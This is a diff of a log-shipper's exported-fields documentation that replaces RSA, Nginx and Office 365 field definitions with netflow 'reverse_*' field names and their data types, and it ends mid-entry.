-*`rsa.investigations.ioc`*:: +*`netflow.reverse_ip_header_packet_section`*:: + -- -This is key capture indicator of compromise - type: keyword -- - -*`rsa.counters.dclass_c1`*:: +*`netflow.reverse_ip_next_hop_ipv4_address`*:: + -- -This is a generic counter key that should be used with the label dclass.c1.str only - -type: long +type: ip -- -*`rsa.counters.dclass_c2`*:: +*`netflow.reverse_ip_next_hop_ipv6_address`*:: + -- -This is a generic counter key that should be used with the label dclass.c2.str only - -type: long +type: ip -- -*`rsa.counters.event_counter`*:: +*`netflow.reverse_ip_payload_length`*:: + -- -This is used to capture the number of times an event repeated - type: long -- -*`rsa.counters.dclass_r1`*:: +*`netflow.reverse_ip_payload_packet_section`*:: + -- -This is a generic ratio key that should be used with the label dclass.r1.str only - type: keyword -- -*`rsa.counters.dclass_c3`*:: +*`netflow.reverse_ip_precedence`*:: + -- -This is a generic counter key that should be used with the label dclass.c3.str only +type: short + +-- +*`netflow.reverse_ip_sec_spi`*:: ++ +-- type: long -- -*`rsa.counters.dclass_c1_str`*:: +*`netflow.reverse_ip_total_length`*:: + -- -This is a generic counter string key that should be used with the label dclass.c1 only - -type: keyword +type: long -- -*`rsa.counters.dclass_c2_str`*:: +*`netflow.reverse_ip_ttl`*:: + -- -This is a generic counter string key that should be used with the label dclass.c2 only - -type: keyword +type: short -- -*`rsa.counters.dclass_r1_str`*:: +*`netflow.reverse_ip_version`*:: + -- -This is a generic ratio string key that should be used with the label dclass.r1 only - -type: keyword +type: short -- -*`rsa.counters.dclass_r2`*:: +*`netflow.reverse_ipv4_ihl`*:: + -- -This is a generic ratio key that should be used with the label dclass.r2.str only - -type: keyword +type: short -- -*`rsa.counters.dclass_c3_str`*:: +*`netflow.reverse_ipv4_options`*:: + -- -This is a generic counter string key that should be used with the label dclass.c3 only - -type: keyword +type: long -- -*`rsa.counters.dclass_r3`*:: +*`netflow.reverse_ipv4_router_sc`*:: + -- -This is a generic ratio key that should be used with the label dclass.r3.str only - -type: keyword +type: ip -- -*`rsa.counters.dclass_r2_str`*:: +*`netflow.reverse_ipv6_extension_headers`*:: + -- -This is a generic ratio string key that should be used with the label dclass.r2 only - -type: keyword +type: long -- -*`rsa.counters.dclass_r3_str`*:: +*`netflow.reverse_is_multicast`*:: + -- -This is a generic ratio string key that should be used with the label dclass.r3 only +type: short -type: keyword +-- +*`netflow.reverse_large_packet_count`*:: ++ -- +type: long +-- -*`rsa.identity.auth_method`*:: +*`netflow.reverse_layer2_frame_delta_count`*:: + -- -This key is used to capture authentication methods used only - -type: keyword +type: long -- -*`rsa.identity.user_role`*:: +*`netflow.reverse_layer2_frame_total_count`*:: + -- -This key is used to capture the Role of a user only - -type: keyword +type: long -- -*`rsa.identity.dn`*:: +*`netflow.reverse_layer2_octet_delta_count`*:: + -- -X.500 (LDAP) Distinguished Name - -type: keyword +type: long -- -*`rsa.identity.logon_type`*:: +*`netflow.reverse_layer2_octet_delta_sum_of_squares`*:: + -- -This key is used to capture the type of logon method used. - -type: keyword +type: long -- -*`rsa.identity.profile`*:: +*`netflow.reverse_layer2_octet_total_count`*:: + -- -This key is used to capture the user profile - -type: keyword +type: long -- -*`rsa.identity.accesses`*:: +*`netflow.reverse_layer2_octet_total_sum_of_squares`*:: + -- -This key is used to capture actual privileges used in accessing an object - -type: keyword +type: long -- -*`rsa.identity.realm`*:: +*`netflow.reverse_layer2_segment_id`*:: + -- -Radius realm or similar grouping of accounts - -type: keyword +type: long -- -*`rsa.identity.user_sid_dst`*:: +*`netflow.reverse_layer2packet_section_data`*:: + -- -This key captures Destination User Session ID - type: keyword -- -*`rsa.identity.dn_src`*:: +*`netflow.reverse_layer2packet_section_offset`*:: + -- -An X.500 (LDAP) Distinguished name that is used in a context that indicates a Source dn - -type: keyword +type: integer -- -*`rsa.identity.org`*:: +*`netflow.reverse_layer2packet_section_size`*:: + -- -This key captures the User organization - -type: keyword +type: integer -- -*`rsa.identity.dn_dst`*:: +*`netflow.reverse_line_card_id`*:: + -- -An X.500 (LDAP) Distinguished name that used in a context that indicates a Destination dn - -type: keyword +type: long -- -*`rsa.identity.firstname`*:: +*`netflow.reverse_lower_ci_limit`*:: + -- -This key is for First Names only, this is used for Healthcare predominantly to capture Patients information - -type: keyword +type: double -- -*`rsa.identity.lastname`*:: +*`netflow.reverse_max_export_seconds`*:: + -- -This key is for Last Names only, this is used for Healthcare predominantly to capture Patients information - -type: keyword +type: long -- -*`rsa.identity.user_dept`*:: +*`netflow.reverse_max_flow_end_microseconds`*:: + -- -User's Department Names only - -type: keyword +type: long -- -*`rsa.identity.user_sid_src`*:: +*`netflow.reverse_max_flow_end_milliseconds`*:: + -- -This key captures Source User Session ID - -type: keyword +type: long -- -*`rsa.identity.federated_sp`*:: +*`netflow.reverse_max_flow_end_nanoseconds`*:: + -- -This key is the Federated Service Provider. This is the application requesting authentication. - -type: keyword +type: long -- -*`rsa.identity.federated_idp`*:: +*`netflow.reverse_max_flow_end_seconds`*:: + -- -This key is the federated Identity Provider. This is the server providing the authentication. - -type: keyword +type: long -- -*`rsa.identity.logon_type_desc`*:: +*`netflow.reverse_max_packet_size`*:: + -- -This key is used to capture the textual description of an integer logon type as stored in the meta key 'logon.type'. - -type: keyword +type: integer -- -*`rsa.identity.middlename`*:: +*`netflow.reverse_maximum_ip_total_length`*:: + -- -This key is for Middle Names only, this is used for Healthcare predominantly to capture Patients information - -type: keyword +type: long -- -*`rsa.identity.password`*:: +*`netflow.reverse_maximum_layer2_total_length`*:: + -- -This key is for Passwords seen in any session, plain text or encrypted - -type: keyword +type: long -- -*`rsa.identity.host_role`*:: +*`netflow.reverse_maximum_ttl`*:: + -- -This key should only be used to capture the role of a Host Machine - -type: keyword +type: short -- -*`rsa.identity.ldap`*:: +*`netflow.reverse_message_md5_checksum`*:: + -- -This key is for Uninterpreted LDAP values. Ldap Values that don’t have a clear query or response context - type: keyword -- -*`rsa.identity.ldap_query`*:: +*`netflow.reverse_message_scope`*:: + -- -This key is the Search criteria from an LDAP search - -type: keyword +type: short -- -*`rsa.identity.ldap_response`*:: +*`netflow.reverse_metering_process_id`*:: + -- -This key is to capture Results from an LDAP search - -type: keyword +type: long -- -*`rsa.identity.owner`*:: +*`netflow.reverse_metro_evc_id`*:: + -- -This is used to capture username the process or service is running as, the author of the task - type: keyword -- -*`rsa.identity.service_account`*:: +*`netflow.reverse_metro_evc_type`*:: + -- -This key is a windows specific key, used for capturing name of the account a service (referenced in the event) is running under. Legacy Usage - -type: keyword +type: short -- - -*`rsa.email.email_dst`*:: +*`netflow.reverse_min_export_seconds`*:: + -- -This key is used to capture the Destination email address only, when the destination context is not clear use email - -type: keyword +type: long -- -*`rsa.email.email_src`*:: +*`netflow.reverse_min_flow_start_microseconds`*:: + -- -This key is used to capture the source email address only, when the source context is not clear use email - -type: keyword +type: long -- -*`rsa.email.subject`*:: +*`netflow.reverse_min_flow_start_milliseconds`*:: + -- -This key is used to capture the subject string from an Email only. - -type: keyword +type: long -- -*`rsa.email.email`*:: +*`netflow.reverse_min_flow_start_nanoseconds`*:: + -- -This key is used to capture a generic email address where the source or destination context is not clear - -type: keyword +type: long -- -*`rsa.email.trans_from`*:: +*`netflow.reverse_min_flow_start_seconds`*:: + -- -Deprecated key defined only in table map. - -type: keyword +type: long -- -*`rsa.email.trans_to`*:: +*`netflow.reverse_minimum_ip_total_length`*:: + -- -Deprecated key defined only in table map. +type: long -type: keyword +-- +*`netflow.reverse_minimum_layer2_total_length`*:: ++ -- +type: long +-- -*`rsa.file.privilege`*:: +*`netflow.reverse_minimum_ttl`*:: + -- -Deprecated, use permissions - -type: keyword +type: short -- -*`rsa.file.attachment`*:: +*`netflow.reverse_monitoring_interval_end_milli_seconds`*:: + -- -This key captures the attachment file name - -type: keyword +type: long -- -*`rsa.file.filesystem`*:: +*`netflow.reverse_monitoring_interval_start_milli_seconds`*:: + -- -type: keyword +type: long -- -*`rsa.file.binary`*:: +*`netflow.reverse_mpls_label_stack_depth`*:: + -- -Deprecated key defined only in table map. - -type: keyword +type: long -- -*`rsa.file.filename_dst`*:: +*`netflow.reverse_mpls_label_stack_length`*:: + -- -This is used to capture name of the file targeted by the action - -type: keyword +type: long -- -*`rsa.file.filename_src`*:: +*`netflow.reverse_mpls_label_stack_section`*:: + -- -This is used to capture name of the parent filename, the file which performed the action - type: keyword -- -*`rsa.file.filename_tmp`*:: +*`netflow.reverse_mpls_label_stack_section10`*:: + -- type: keyword -- -*`rsa.file.directory_dst`*:: +*`netflow.reverse_mpls_label_stack_section2`*:: + -- -This key is used to capture the directory of the target process or file - type: keyword -- -*`rsa.file.directory_src`*:: +*`netflow.reverse_mpls_label_stack_section3`*:: + -- -This key is used to capture the directory of the source process or file - type: keyword -- -*`rsa.file.file_entropy`*:: +*`netflow.reverse_mpls_label_stack_section4`*:: + -- -This is used to capture entropy vale of a file - -type: double +type: keyword -- -*`rsa.file.file_vendor`*:: +*`netflow.reverse_mpls_label_stack_section5`*:: + -- -This is used to capture Company name of file located in version_info - type: keyword -- -*`rsa.file.task_name`*:: +*`netflow.reverse_mpls_label_stack_section6`*:: + -- -This is used to capture name of the task - type: keyword -- - -*`rsa.web.fqdn`*:: +*`netflow.reverse_mpls_label_stack_section7`*:: + -- -Fully Qualified Domain Names - type: keyword -- -*`rsa.web.web_cookie`*:: +*`netflow.reverse_mpls_label_stack_section8`*:: + -- -This key is used to capture the Web cookies specifically. - type: keyword -- -*`rsa.web.alias_host`*:: +*`netflow.reverse_mpls_label_stack_section9`*:: + -- type: keyword -- -*`rsa.web.reputation_num`*:: +*`netflow.reverse_mpls_payload_length`*:: + -- -Reputation Number of an entity. Typically used for Web Domains - -type: double +type: long -- -*`rsa.web.web_ref_domain`*:: +*`netflow.reverse_mpls_payload_packet_section`*:: + -- -Web referer's domain - type: keyword -- -*`rsa.web.web_ref_query`*:: +*`netflow.reverse_mpls_top_label_exp`*:: + -- -This key captures Web referer's query portion of the URL - -type: keyword +type: short -- -*`rsa.web.remote_domain`*:: +*`netflow.reverse_mpls_top_label_ipv4_address`*:: + -- -type: keyword +type: ip -- -*`rsa.web.web_ref_page`*:: +*`netflow.reverse_mpls_top_label_ipv6_address`*:: + -- -This key captures Web referer's page information - -type: keyword +type: ip -- -*`rsa.web.web_ref_root`*:: +*`netflow.reverse_mpls_top_label_prefix_length`*:: + -- -Web referer's root URL path - -type: keyword +type: short -- -*`rsa.web.cn_asn_dst`*:: +*`netflow.reverse_mpls_top_label_stack_section`*:: + -- type: keyword -- -*`rsa.web.cn_rpackets`*:: +*`netflow.reverse_mpls_top_label_ttl`*:: + -- -type: keyword +type: short -- -*`rsa.web.urlpage`*:: +*`netflow.reverse_mpls_top_label_type`*:: + -- -type: keyword +type: short -- -*`rsa.web.urlroot`*:: +*`netflow.reverse_mpls_vpn_route_distinguisher`*:: + -- type: keyword -- -*`rsa.web.p_url`*:: +*`netflow.reverse_multicast_replication_factor`*:: + -- -type: keyword +type: long -- -*`rsa.web.p_user_agent`*:: +*`netflow.reverse_nat_event`*:: + -- -type: keyword +type: short -- -*`rsa.web.p_web_cookie`*:: +*`netflow.reverse_nat_originating_address_realm`*:: + -- -type: keyword +type: short -- -*`rsa.web.p_web_method`*:: +*`netflow.reverse_nat_pool_id`*:: + -- -type: keyword +type: long -- -*`rsa.web.p_web_referer`*:: +*`netflow.reverse_nat_pool_name`*:: + -- type: keyword -- -*`rsa.web.web_extension_tmp`*:: +*`netflow.reverse_nat_type`*:: + -- -type: keyword +type: short -- -*`rsa.web.web_page`*:: +*`netflow.reverse_new_connection_delta_count`*:: + -- -type: keyword +type: long -- - -*`rsa.threat.threat_category`*:: +*`netflow.reverse_next_header_ipv6`*:: + -- -This key captures Threat Name/Threat Category/Categorization of alert - -type: keyword +type: short -- -*`rsa.threat.threat_desc`*:: +*`netflow.reverse_non_empty_packet_count`*:: + -- -This key is used to capture the threat description from the session directly or inferred - -type: keyword +type: long -- -*`rsa.threat.alert`*:: +*`netflow.reverse_not_sent_layer2_octet_total_count`*:: + -- -This key is used to capture name of the alert - -type: keyword +type: long -- -*`rsa.threat.threat_source`*:: +*`netflow.reverse_observation_domain_name`*:: + -- -This key is used to capture source of the threat - type: keyword -- - -*`rsa.crypto.crypto`*:: +*`netflow.reverse_observation_point_id`*:: + -- -This key is used to capture the Encryption Type or Encryption Key only - -type: keyword +type: long -- -*`rsa.crypto.cipher_src`*:: +*`netflow.reverse_observation_point_type`*:: + -- -This key is for Source (Client) Cipher - -type: keyword +type: short -- -*`rsa.crypto.cert_subject`*:: +*`netflow.reverse_observation_time_microseconds`*:: + -- -This key is used to capture the Certificate organization only - -type: keyword +type: long -- -*`rsa.crypto.peer`*:: +*`netflow.reverse_observation_time_milliseconds`*:: + -- -This key is for Encryption peer's IP Address - -type: keyword +type: long -- -*`rsa.crypto.cipher_size_src`*:: +*`netflow.reverse_observation_time_nanoseconds`*:: + -- -This key captures Source (Client) Cipher Size - type: long -- -*`rsa.crypto.ike`*:: +*`netflow.reverse_observation_time_seconds`*:: + -- -IKE negotiation phase. - -type: keyword +type: long -- -*`rsa.crypto.scheme`*:: +*`netflow.reverse_octet_delta_count`*:: + -- -This key captures the Encryption scheme used - -type: keyword +type: long -- -*`rsa.crypto.peer_id`*:: +*`netflow.reverse_octet_delta_sum_of_squares`*:: + -- -This key is for Encryption peer’s identity - -type: keyword +type: long -- -*`rsa.crypto.sig_type`*:: +*`netflow.reverse_octet_total_count`*:: + -- -This key captures the Signature Type - -type: keyword +type: long -- -*`rsa.crypto.cert_issuer`*:: +*`netflow.reverse_octet_total_sum_of_squares`*:: + -- -type: keyword +type: long -- -*`rsa.crypto.cert_host_name`*:: +*`netflow.reverse_opaque_octets`*:: + -- -Deprecated key defined only in table map. - type: keyword -- -*`rsa.crypto.cert_error`*:: +*`netflow.reverse_original_exporter_ipv4_address`*:: + -- -This key captures the Certificate Error String - -type: keyword +type: ip -- -*`rsa.crypto.cipher_dst`*:: +*`netflow.reverse_original_exporter_ipv6_address`*:: + -- -This key is for Destination (Server) Cipher - -type: keyword +type: ip -- -*`rsa.crypto.cipher_size_dst`*:: +*`netflow.reverse_original_flows_completed`*:: + -- -This key captures Destination (Server) Cipher Size - type: long -- -*`rsa.crypto.ssl_ver_src`*:: +*`netflow.reverse_original_flows_initiated`*:: + -- -Deprecated, use version - -type: keyword +type: long -- -*`rsa.crypto.d_certauth`*:: +*`netflow.reverse_original_flows_present`*:: + -- -type: keyword +type: long -- -*`rsa.crypto.s_certauth`*:: +*`netflow.reverse_original_observation_domain_id`*:: + -- -type: keyword +type: long -- -*`rsa.crypto.ike_cookie1`*:: +*`netflow.reverse_os_finger_print`*:: + -- -ID of the negotiation — sent for ISAKMP Phase One - type: keyword -- -*`rsa.crypto.ike_cookie2`*:: +*`netflow.reverse_os_name`*:: + -- -ID of the negotiation — sent for ISAKMP Phase Two - type: keyword -- -*`rsa.crypto.cert_checksum`*:: +*`netflow.reverse_os_version`*:: + -- type: keyword -- -*`rsa.crypto.cert_host_cat`*:: +*`netflow.reverse_p2p_technology`*:: + -- -This key is used for the hostname category value of a certificate - type: keyword -- -*`rsa.crypto.cert_serial`*:: +*`netflow.reverse_packet_delta_count`*:: + -- -This key is used to capture the Certificate serial number only - -type: keyword +type: long -- -*`rsa.crypto.cert_status`*:: +*`netflow.reverse_packet_total_count`*:: + -- -This key captures Certificate validation status - -type: keyword +type: long -- -*`rsa.crypto.ssl_ver_dst`*:: +*`netflow.reverse_payload`*:: + -- -Deprecated, use version - type: keyword -- -*`rsa.crypto.cert_keysize`*:: +*`netflow.reverse_payload_entropy`*:: + -- -type: keyword +type: short -- -*`rsa.crypto.cert_username`*:: +*`netflow.reverse_payload_length_ipv6`*:: + -- -type: keyword +type: integer -- -*`rsa.crypto.https_insact`*:: +*`netflow.reverse_port_id`*:: + -- -type: keyword +type: long -- -*`rsa.crypto.https_valid`*:: +*`netflow.reverse_port_range_end`*:: + -- -type: keyword +type: integer -- -*`rsa.crypto.cert_ca`*:: +*`netflow.reverse_port_range_num_ports`*:: + -- -This key is used to capture the Certificate signing authority only - -type: keyword +type: integer -- -*`rsa.crypto.cert_common`*:: +*`netflow.reverse_port_range_start`*:: + -- -This key is used to capture the Certificate common name only - -type: keyword +type: integer -- - -*`rsa.wireless.wlan_ssid`*:: +*`netflow.reverse_port_range_step_size`*:: + -- -This key is used to capture the ssid of a Wireless Session - -type: keyword +type: integer -- -*`rsa.wireless.access_point`*:: +*`netflow.reverse_post_destination_mac_address`*:: + -- -This key is used to capture the access point name. - type: keyword -- -*`rsa.wireless.wlan_channel`*:: +*`netflow.reverse_post_dot1q_customer_vlan_id`*:: + -- -This is used to capture the channel names - -type: long +type: integer -- -*`rsa.wireless.wlan_name`*:: +*`netflow.reverse_post_dot1q_vlan_id`*:: + -- -This key captures either WLAN number/name - -type: keyword +type: integer -- - -*`rsa.storage.disk_volume`*:: +*`netflow.reverse_post_ip_class_of_service`*:: + -- -A unique name assigned to logical units (volumes) within a physical disk - -type: keyword +type: short -- -*`rsa.storage.lun`*:: +*`netflow.reverse_post_ip_diff_serv_code_point`*:: + -- -Logical Unit Number.This key is a very useful concept in Storage. - -type: keyword +type: short -- -*`rsa.storage.pwwn`*:: +*`netflow.reverse_post_ip_precedence`*:: + -- -This uniquely identifies a port on a HBA. - -type: keyword +type: short -- - -*`rsa.physical.org_dst`*:: +*`netflow.reverse_post_layer2_octet_delta_count`*:: + -- -This is used to capture the destination organization based on the GEOPIP Maxmind database. - -type: keyword +type: long -- -*`rsa.physical.org_src`*:: +*`netflow.reverse_post_layer2_octet_total_count`*:: + -- -This is used to capture the source organization based on the GEOPIP Maxmind database. - -type: keyword +type: long -- - -*`rsa.healthcare.patient_fname`*:: +*`netflow.reverse_post_mcast_layer2_octet_delta_count`*:: + -- -This key is for First Names only, this is used for Healthcare predominantly to capture Patients information - -type: keyword +type: long -- -*`rsa.healthcare.patient_id`*:: +*`netflow.reverse_post_mcast_layer2_octet_total_count`*:: + -- -This key captures the unique ID for a patient - -type: keyword +type: long -- -*`rsa.healthcare.patient_lname`*:: +*`netflow.reverse_post_mcast_octet_delta_count`*:: + -- -This key is for Last Names only, this is used for Healthcare predominantly to capture Patients information - -type: keyword +type: long -- -*`rsa.healthcare.patient_mname`*:: +*`netflow.reverse_post_mcast_octet_total_count`*:: + -- -This key is for Middle Names only, this is used for Healthcare predominantly to capture Patients information - -type: keyword +type: long -- - -*`rsa.endpoint.host_state`*:: +*`netflow.reverse_post_mcast_packet_delta_count`*:: + -- -This key is used to capture the current state of the machine, such as blacklisted, infected, firewall disabled and so on - -type: keyword +type: long -- -*`rsa.endpoint.registry_key`*:: +*`netflow.reverse_post_mcast_packet_total_count`*:: + -- -This key captures the path to the registry key - -type: keyword +type: long -- -*`rsa.endpoint.registry_value`*:: +*`netflow.reverse_post_mpls_top_label_exp`*:: + -- -This key captures values or decorators used within a registry entry - -type: keyword +type: short -- -[[exported-fields-nginx]] -== Nginx fields - -Module for parsing the Nginx log files. - - - -[float] -=== nginx - -Fields from the Nginx log files. - - - -[float] -=== access - -Contains fields for the Nginx access logs. - - - -*`nginx.access.remote_ip_list`*:: +*`netflow.reverse_post_napt_destination_transport_port`*:: + -- -An array of remote IP addresses. It is a list because it is common to include, besides the client IP address, IP addresses from headers like `X-Forwarded-For`. Real source IP is restored to `source.ip`. - - -type: array +type: integer -- -*`nginx.access.body_sent.bytes`*:: +*`netflow.reverse_post_napt_source_transport_port`*:: + -- -type: alias - -alias to: http.response.body.bytes +type: integer -- -*`nginx.access.user_name`*:: +*`netflow.reverse_post_nat_destination_ipv4_address`*:: + -- -type: alias - -alias to: user.name +type: ip -- -*`nginx.access.method`*:: +*`netflow.reverse_post_nat_destination_ipv6_address`*:: + -- -type: alias - -alias to: http.request.method +type: ip -- -*`nginx.access.url`*:: +*`netflow.reverse_post_nat_source_ipv4_address`*:: + -- -type: alias - -alias to: url.original +type: ip -- -*`nginx.access.http_version`*:: +*`netflow.reverse_post_nat_source_ipv6_address`*:: + -- -type: alias - -alias to: http.version +type: ip -- -*`nginx.access.response_code`*:: +*`netflow.reverse_post_octet_delta_count`*:: + -- -type: alias - -alias to: http.response.status_code +type: long -- -*`nginx.access.referrer`*:: +*`netflow.reverse_post_octet_total_count`*:: + -- -type: alias - -alias to: http.request.referrer +type: long -- -*`nginx.access.agent`*:: +*`netflow.reverse_post_packet_delta_count`*:: + -- -type: alias - -alias to: user_agent.original +type: long -- - -*`nginx.access.user_agent.device`*:: +*`netflow.reverse_post_packet_total_count`*:: + -- -type: alias - -alias to: user_agent.device.name +type: long -- -*`nginx.access.user_agent.name`*:: +*`netflow.reverse_post_source_mac_address`*:: + -- -type: alias - -alias to: user_agent.name +type: keyword -- -*`nginx.access.user_agent.os`*:: +*`netflow.reverse_post_vlan_id`*:: + -- -type: alias - -alias to: user_agent.os.full_name +type: integer -- -*`nginx.access.user_agent.os_name`*:: +*`netflow.reverse_private_enterprise_number`*:: + -- -type: alias - -alias to: user_agent.os.name +type: long -- -*`nginx.access.user_agent.original`*:: +*`netflow.reverse_protocol_identifier`*:: + -- -type: alias - -alias to: user_agent.original +type: short -- - -*`nginx.access.geoip.continent_name`*:: +*`netflow.reverse_pseudo_wire_control_word`*:: + -- -type: alias - -alias to: source.geo.continent_name +type: long -- -*`nginx.access.geoip.country_iso_code`*:: +*`netflow.reverse_pseudo_wire_destination_ipv4_address`*:: + -- -type: alias - -alias to: source.geo.country_iso_code +type: ip -- -*`nginx.access.geoip.location`*:: +*`netflow.reverse_pseudo_wire_id`*:: + -- -type: alias - -alias to: source.geo.location +type: long -- -*`nginx.access.geoip.region_name`*:: +*`netflow.reverse_pseudo_wire_type`*:: + -- -type: alias - -alias to: source.geo.region_name +type: integer -- -*`nginx.access.geoip.city_name`*:: +*`netflow.reverse_relative_error`*:: + -- -type: alias - -alias to: source.geo.city_name +type: double -- -*`nginx.access.geoip.region_iso_code`*:: +*`netflow.reverse_responder_octets`*:: + -- -type: alias - -alias to: source.geo.region_iso_code +type: long -- -[float] -=== error - -Contains fields for the Nginx error logs. - - - -*`nginx.error.connection_id`*:: +*`netflow.reverse_responder_packets`*:: + -- -Connection identifier. - - type: long -- -*`nginx.error.level`*:: +*`netflow.reverse_rfc3550_jitter_microseconds`*:: + -- -type: alias - -alias to: log.level +type: long -- -*`nginx.error.pid`*:: +*`netflow.reverse_rfc3550_jitter_milliseconds`*:: + -- -type: alias - -alias to: process.pid +type: long -- -*`nginx.error.tid`*:: +*`netflow.reverse_rfc3550_jitter_nanoseconds`*:: + -- -type: alias - -alias to: process.thread.id +type: long -- -*`nginx.error.message`*:: +*`netflow.reverse_rtp_payload_type`*:: + -- -type: alias - -alias to: message +type: short -- -[float] -=== ingress_controller - -Contains fields for the Ingress Nginx controller access logs. - - - -*`nginx.ingress_controller.remote_ip_list`*:: +*`netflow.reverse_rtp_sequence_number`*:: + -- -An array of remote IP addresses. It is a list because it is common to include, besides the client IP address, IP addresses from headers like `X-Forwarded-For`. Real source IP is restored to `source.ip`. - - -type: array +type: integer -- -*`nginx.ingress_controller.upstream_address_list`*:: +*`netflow.reverse_sampler_id`*:: + -- -An array of the upstream addresses. It is a list because it is common that several upstream servers were contacted during request processing. - - -type: keyword +type: short -- -*`nginx.ingress_controller.upstream.response.length_list`*:: +*`netflow.reverse_sampler_mode`*:: + -- -An array of upstream response lengths. It is a list because it is common that several upstream servers were contacted during request processing. - - -type: keyword +type: short -- -*`nginx.ingress_controller.upstream.response.time_list`*:: +*`netflow.reverse_sampler_name`*:: + -- -An array of upstream response durations. It is a list because it is common that several upstream servers were contacted during request processing. - - type: keyword -- -*`nginx.ingress_controller.upstream.response.status_code_list`*:: +*`netflow.reverse_sampler_random_interval`*:: + -- -An array of upstream response status codes. It is a list because it is common that several upstream servers were contacted during request processing. - - -type: keyword +type: long -- -*`nginx.ingress_controller.http.request.length`*:: +*`netflow.reverse_sampling_algorithm`*:: + -- -The request length (including request line, header, and request body) +type: short +-- +*`netflow.reverse_sampling_flow_interval`*:: ++ +-- type: long -format: bytes - -- -*`nginx.ingress_controller.http.request.time`*:: +*`netflow.reverse_sampling_flow_spacing`*:: + -- -Time elapsed since the first bytes were read from the client - - -type: double - -format: duration +type: long -- -*`nginx.ingress_controller.upstream.name`*:: +*`netflow.reverse_sampling_interval`*:: + -- -The name of the upstream. - - -type: keyword +type: long -- -*`nginx.ingress_controller.upstream.alternative_name`*:: +*`netflow.reverse_sampling_packet_interval`*:: + -- -The name of the alternative upstream. - - -type: keyword +type: long -- -*`nginx.ingress_controller.upstream.response.length`*:: +*`netflow.reverse_sampling_packet_space`*:: + -- -The length of the response obtained from the upstream server. If several servers were contacted during request process, the summary of the multiple response lengths is stored. - - type: long -format: bytes - -- -*`nginx.ingress_controller.upstream.response.time`*:: +*`netflow.reverse_sampling_population`*:: + -- -The time spent on receiving the response from the upstream as seconds with millisecond resolution. If several servers were contacted during request process, the summary of the multiple response times is stored. +type: long +-- +*`netflow.reverse_sampling_probability`*:: ++ +-- type: double -format: duration - -- -*`nginx.ingress_controller.upstream.response.status_code`*:: +*`netflow.reverse_sampling_size`*:: + -- -The status code of the response obtained from the upstream server. If several servers were contacted during request process, only the status code of the response from the last one is stored in this field. - - type: long -- -*`nginx.ingress_controller.upstream.ip`*:: +*`netflow.reverse_sampling_time_interval`*:: + -- -The IP address of the upstream server. If several servers were contacted during request process, only the last one is stored in this field. - - -type: ip +type: long -- -*`nginx.ingress_controller.upstream.port`*:: +*`netflow.reverse_sampling_time_space`*:: + -- -The port of the upstream server. If several servers were contacted during request process, only the last one is stored in this field. - - type: long -- -*`nginx.ingress_controller.http.request.id`*:: +*`netflow.reverse_second_packet_banner`*:: + -- -The randomly generated ID of the request - - type: keyword -- -*`nginx.ingress_controller.body_sent.bytes`*:: +*`netflow.reverse_section_exported_octets`*:: + -- -type: alias - -alias to: http.response.body.bytes +type: integer -- -*`nginx.ingress_controller.user_name`*:: +*`netflow.reverse_section_offset`*:: + -- -type: alias - -alias to: user.name +type: integer -- -*`nginx.ingress_controller.method`*:: +*`netflow.reverse_selection_sequence_id`*:: + -- -type: alias - -alias to: http.request.method +type: long -- -*`nginx.ingress_controller.url`*:: +*`netflow.reverse_selector_algorithm`*:: + -- -type: alias - -alias to: url.original +type: integer -- -*`nginx.ingress_controller.http_version`*:: +*`netflow.reverse_selector_id`*:: + -- -type: alias - -alias to: http.version +type: long -- -*`nginx.ingress_controller.response_code`*:: +*`netflow.reverse_selector_id_total_flows_observed`*:: + -- -type: alias - -alias to: http.response.status_code +type: long -- -*`nginx.ingress_controller.referrer`*:: +*`netflow.reverse_selector_id_total_flows_selected`*:: + -- -type: alias - -alias to: http.request.referrer +type: long -- -*`nginx.ingress_controller.agent`*:: +*`netflow.reverse_selector_id_total_pkts_observed`*:: + -- -type: alias - -alias to: user_agent.original +type: long -- - -*`nginx.ingress_controller.user_agent.device`*:: +*`netflow.reverse_selector_id_total_pkts_selected`*:: + -- -type: alias - -alias to: user_agent.device.name +type: long -- -*`nginx.ingress_controller.user_agent.name`*:: +*`netflow.reverse_selector_name`*:: + -- -type: alias - -alias to: user_agent.name +type: keyword -- -*`nginx.ingress_controller.user_agent.os`*:: +*`netflow.reverse_session_scope`*:: + -- -type: alias - -alias to: user_agent.os.full_name +type: short -- -*`nginx.ingress_controller.user_agent.os_name`*:: +*`netflow.reverse_small_packet_count`*:: + -- -type: alias - -alias to: user_agent.os.name +type: long -- -*`nginx.ingress_controller.user_agent.original`*:: +*`netflow.reverse_source_ipv4_address`*:: + -- -type: alias - -alias to: user_agent.original +type: ip -- - -*`nginx.ingress_controller.geoip.continent_name`*:: +*`netflow.reverse_source_ipv4_prefix`*:: + -- -type: alias - -alias to: source.geo.continent_name +type: ip -- -*`nginx.ingress_controller.geoip.country_iso_code`*:: +*`netflow.reverse_source_ipv4_prefix_length`*:: + -- -type: alias - -alias to: source.geo.country_iso_code +type: short -- -*`nginx.ingress_controller.geoip.location`*:: +*`netflow.reverse_source_ipv6_address`*:: + -- -type: alias - -alias to: source.geo.location +type: ip -- -*`nginx.ingress_controller.geoip.region_name`*:: +*`netflow.reverse_source_ipv6_prefix`*:: + -- -type: alias - -alias to: source.geo.region_name +type: ip -- -*`nginx.ingress_controller.geoip.city_name`*:: +*`netflow.reverse_source_ipv6_prefix_length`*:: + -- -type: alias - -alias to: source.geo.city_name +type: short -- -*`nginx.ingress_controller.geoip.region_iso_code`*:: +*`netflow.reverse_source_mac_address`*:: + -- -type: alias - -alias to: source.geo.region_iso_code +type: keyword -- -[[exported-fields-o365]] -== Office 365 fields - -Module for handling logs from Office 365. - - - -[float] -=== o365.audit - -Fields from Office 365 Management API audit logs. - - - -*`o365.audit.Actor`*:: +*`netflow.reverse_source_transport_port`*:: + -- -type: array +type: integer -- -*`o365.audit.ActorContextId`*:: +*`netflow.reverse_src_traffic_index`*:: + -- -type: keyword +type: long -- -*`o365.audit.ActorIpAddress`*:: +*`netflow.reverse_sta_ipv4_address`*:: + -- -type: keyword +type: ip -- -*`o365.audit.ActorUserId`*:: +*`netflow.reverse_sta_mac_address`*:: + -- type: keyword -- -*`o365.audit.ActorYammerUserId`*:: +*`netflow.reverse_standard_deviation_interarrival_time`*:: + -- -type: keyword +type: long -- -*`o365.audit.AlertEntityId`*:: +*`netflow.reverse_standard_deviation_payload_length`*:: + -- -type: keyword +type: integer -- -*`o365.audit.AlertId`*:: +*`netflow.reverse_system_init_time_milliseconds`*:: + -- -type: keyword +type: long -- -*`o365.audit.AlertLinks`*:: +*`netflow.reverse_tcp_ack_total_count`*:: + -- -type: array +type: long -- -*`o365.audit.AlertType`*:: 